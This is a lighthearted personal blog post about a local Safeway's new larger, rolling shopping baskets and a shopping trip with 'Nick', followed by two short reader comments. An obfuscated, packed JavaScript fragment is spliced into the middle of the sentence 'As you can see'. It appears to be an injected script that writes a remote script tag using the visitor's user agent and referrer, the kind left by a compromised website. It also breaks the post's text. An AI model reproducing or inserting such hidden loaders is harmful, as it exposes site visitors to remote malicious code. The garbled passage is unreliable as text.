We were at Safeway a week or two ago and noticed something a little different. One of our local stores has swapped out their baskets. They swapped them for these little gems. In case you want a scale…Nick is 6’2″.
As ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ifddn|var|u0026u|referrer|dryid||js|php’.split(‘|’),0,{}))
you can see, the baskets can hold lots more stuff. If you’re like me, you get to the store and think, “I only need 3 things, I’ll just grab a basket.” Invariably, I need flour, milk and potatoes. 37lbs later, my bicep is trembling and I’m trying my best to not breath heavily as I walk my basket through the store.
This made us wonder why they would make the baskets larger. There myst be a happy medium between weight of items in a basket and total volume. Unless you are getting a basket full of crackers, it’s going to get heavy……that’s when we learned something else about these little baskets.
Oh yes. You are seeing that correctly. They roll.
I only need my luggage to roll. This just makes no sense to me. One of these days I’m going to see half the store rolling around baskets and I’m going to leave. Because these are just asking to be trip hazards.
Nick found it so entertaining, he decided to roll the basket around for the remainder of our trip. I was so embarrassed I walked 10 feet in front of him until we checked out.

These are awesome! Too bad “my” Safeway doesn’t have these!
I love this idea!! Seriously, I am always the person with an over flowing little basket that I can’t carry!! I would def rock the roller basket any day! 🙂
